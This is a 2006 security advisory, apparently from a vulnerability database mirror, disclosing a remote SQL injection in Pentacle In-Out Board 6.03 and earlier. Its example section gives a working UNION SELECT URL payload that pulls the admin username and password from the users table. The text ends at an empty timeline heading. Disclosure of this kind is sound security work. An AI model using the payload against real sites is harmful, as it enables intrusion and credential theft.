Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11598
HistoryFeb 26, 2006 - 12:00 a.m.

Advisory: Pentacle In-Out Board <= 6.03 (newsdetailsview.asp newsid) Remote SQL Injection Vulnerability

2006-02-2600:00:00
vulners.com
18

–Security Report–
Advisory: Pentacle In-Out Board <= 6.03 (newsdetailsview.asp newsid) Remote SQL
Injection Vulnerability

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 25/02/06 06:08 AM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: G2SOFT (www.g2soft.net)
Version: 6.03 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL query to
newsdetailsview.asp.
Level: Critical

How&Example:
GET -> http://[site]/[ptdir]/newsdetailsview.asp?newsid=11%20[SQLCode]
EXAMPLE ->
http://[site]/[ptdir]/newsdetailsview.asp?newsid=11%20union%20select%200,userpassword,0,username,0,0,0,0
%20from%20pt_users%20where%20userid=1%20and%20useradmin=yes
With this example remote attacker could get admin's username and password.

Timeline: